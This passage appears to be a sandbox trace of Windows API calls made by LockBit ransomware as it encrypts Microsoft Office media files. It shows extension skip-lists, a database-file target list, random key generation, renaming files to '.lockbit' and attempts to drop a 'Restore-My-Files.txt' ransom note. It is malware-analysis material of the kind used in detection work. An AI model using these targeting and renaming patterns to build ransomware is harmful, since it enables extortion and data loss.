[0197.385] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.386] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.386] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF.lockbit") returned 70 [0197.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251301.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.387] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.388] malloc (_Size=0x40068) returned 0x3df0008 [0197.388] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5272) returned 1 [0197.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.389] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.394] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.394] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.394] free (_Block=0x1fa2ed8) [0197.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf384f00, ftCreationTime.dwHighDateTime=0x1beb2f6, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf384f00, ftLastWriteTime.dwHighDateTime=0x1beb2f6, nFileSizeHigh=0x0, nFileSizeLow=0x1232, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0251871.WMF", cAlternateFileName="")) returned 1 [0197.394] lstrcmpiW (lpString1=".", lpString2="J0251871.WMF") returned -1 [0197.394] lstrcmpiW (lpString1="..", lpString2="J0251871.WMF") returned -1 [0197.394] PathFindExtensionW (pszPath="J0251871.WMF") returned=".WMF" [0197.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.395] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0251871.WMF") returned 1 [0197.396] lstrcmpiW (lpString1="ntldr", lpString2="J0251871.WMF") returned 1 [0197.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0251871.WMF") returned 1 [0197.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0251871.WMF") returned -1 [0197.396] lstrcmpiW (lpString1="autorun.inf", lpString2="J0251871.WMF") returned -1 [0197.396] lstrcmpiW (lpString1="thumbs.db", lpString2="J0251871.WMF") returned 1 [0197.396] lstrcmpiW (lpString1="iconcache.db", lpString2="J0251871.WMF") returned -1 [0197.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF") returned=".WMF" [0197.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.396] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.396] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.397] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.397] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF.lockbit") returned 70 [0197.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251871.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.400] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.400] malloc (_Size=0x40068) returned 0x3df0008 [0197.400] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4658) returned 1 [0197.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.401] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.407] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.407] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.409] free (_Block=0x1fa2ed8) [0197.409] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.409] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.409] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db62a00, ftCreationTime.dwHighDateTime=0x1beb2f6, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3db62a00, ftLastWriteTime.dwHighDateTime=0x1beb2f6, nFileSizeHigh=0x0, nFileSizeLow=0x11b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0251925.WMF", cAlternateFileName="")) returned 1 [0197.409] lstrcmpiW (lpString1=".", lpString2="J0251925.WMF") returned -1 [0197.409] lstrcmpiW (lpString1="..", lpString2="J0251925.WMF") returned -1 [0197.409] PathFindExtensionW (pszPath="J0251925.WMF") returned=".WMF" [0197.409] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.409] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.409] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.409] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.409] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.409] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.410] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.410] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0251925.WMF") returned 1 [0197.411] lstrcmpiW (lpString1="ntldr", lpString2="J0251925.WMF") returned 1 [0197.411] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0251925.WMF") returned 1 [0197.411] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0251925.WMF") returned -1 [0197.411] lstrcmpiW (lpString1="autorun.inf", lpString2="J0251925.WMF") returned -1 [0197.411] lstrcmpiW (lpString1="thumbs.db", lpString2="J0251925.WMF") returned 1 [0197.411] lstrcmpiW (lpString1="iconcache.db", lpString2="J0251925.WMF") returned -1 [0197.411] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.411] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF") returned=".WMF" [0197.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.411] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.412] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.413] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF.lockbit") returned 70 [0197.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251925.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.415] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.415] malloc (_Size=0x40068) returned 0x3df0008 [0197.415] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4534) returned 1 [0197.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.416] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.421] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.421] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.421] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.421] free (_Block=0x1fa2ed8) [0197.422] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.422] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.422] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.422] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8de800, ftCreationTime.dwHighDateTime=0x1beb2f7, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfb8de800, ftLastWriteTime.dwHighDateTime=0x1beb2f7, nFileSizeHigh=0x0, nFileSizeLow=0x158c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0252349.WMF", cAlternateFileName="")) returned 1 [0197.422] lstrcmpiW (lpString1=".", lpString2="J0252349.WMF") returned -1 [0197.422] lstrcmpiW (lpString1="..", lpString2="J0252349.WMF") returned -1 [0197.422] PathFindExtensionW (pszPath="J0252349.WMF") returned=".WMF" [0197.422] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".mod", 